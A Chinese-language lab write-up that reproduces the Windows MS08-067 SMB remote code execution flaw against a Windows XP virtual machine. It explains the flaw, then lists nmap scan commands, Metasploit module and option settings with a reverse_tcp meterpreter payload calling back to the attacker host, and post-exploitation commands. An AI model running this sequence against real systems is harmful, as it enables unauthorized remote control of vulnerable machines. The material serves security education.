一.漏洞描述
MS08-067漏洞全称是“Windows Server服务RPC请求缓冲区溢出漏洞”,攻击者利用受害者主机默认开放的SMB服务端口445,发送特殊RPC(Remote Procedure Call,远程过程调用)请求,造成栈缓冲区内存错误,从而被利用实施远程代码执行。
当用户在受影响的系统上收到RPC请求时,该漏洞会允许远程执行代码,攻击者可以在未经身份验证情况下利用此漏洞运行任意代码。同时,该漏洞可以用于蠕虫攻击。它影响了某些旧版本的Windows系统,包括:
- Windows 2000
- Windows XP
- Windows Server 2003
漏洞原理:
MS08-067漏洞是通过MSRPC over SMB通道调用Server程序中的NEtPathCanonicalize函数时触发的。NetPathCanonicalize函数在远程访问其他主机时,会调用NetpwPathCanonicalize函数,对远程访问的路径进行规范化,而在NetpwPathCanonicalize函数中发生了栈缓冲区内存错误(溢出),造成可被利用实施远程代码执行(Remote Code Execution)。
二.环境搭建
1. 环境准备
- 受害机:Windows XP SP3
- 攻击机:Kali
确保虚拟机两个系统之间能够相互通信。
- Kali:192.168.200.104
- Win XP:192.168.200.108
打开Windows XP系统,确定445端口开启。如下图所示,在Win XP的CMD中输入“netstat -ano”查看端口445是否打开。
关闭Windows XP系统的防火墙。
2.445端口详解
“135、137、138、139和445端口”都是与文件共享和打印机共享有关的端口,而且在这几个端口上经常爆发很严重的漏洞。比如2017年危害全球的永恒之蓝,就是利用的445端口。本篇文章的445端口就是利用SMB(Server Message Block)Windows协议族,用于文件共享、打印共享的服务。
三.利用Metasploit复现漏洞
1.利用Nmap工具扫描端口及确认该漏洞是否存在。
nmap -n -p 445 --script smb-vuln-ms08-067 192.168.200.108 --open
nmap漏扫脚本目录为“/usr/share/nmap/script/”,扫描结果为VULNERABLE,表示MS0808-067漏洞存在且可以利用。
或者使用 “nmap -sV -Pn 192.168.200.108” 查看目标主机开放的端口。目标机开放了135、139、445、1025、5000端口,且目标机系统为Windows XP。
2.进入Msfconsole并利用search语句查找漏洞利用模块。
终端内输入"msfconsole"打开metasploite命令行客户端,使用search命令查找ms08-067的漏洞利用模块。
search ms08-067
3.进入漏洞模块,并查看相关的使用说明。
使用use命令选择我们要使用的利用模块。target设置为系统默认是自动定位,如果需要精确定位,可以show targets查看所有,然后进行选择。
use exploit/windows/smb/ms08_067_netapi/use 0
show options
show targets
4.设置攻击机、受害机信息。
# 目标机ip
set RHOST 192.168.200.108
# 端口号
set RPORT 445
# 设置payload
set payload windows/meterpreter/reverse_tcp
# 攻击机ip
set LHOST 192.168.200.104
# 设置自动类型
set target 34
# 显示配置信息
show options
5.运行exploit反弹shell。
此时我们成功获取了Windows XP系统的Shell,我们调用“ipconfig”查看的IP地址也是目标的 “192.168.200.108”。
exploit/run
ipconfig
pwd
shell获得控制台权限
chcp 65001解决乱码
exit退出到meterpreter
quit退出会话
6.在目标主机上创建文件夹及文件。
cd ..
# 创建文件夹
mkdir hacker
# 访问目录
dir
cd hacker
# 创建文件并写入内容
echo "hello,i am a hacker!" > hacker.txt
7.截图。
screenshot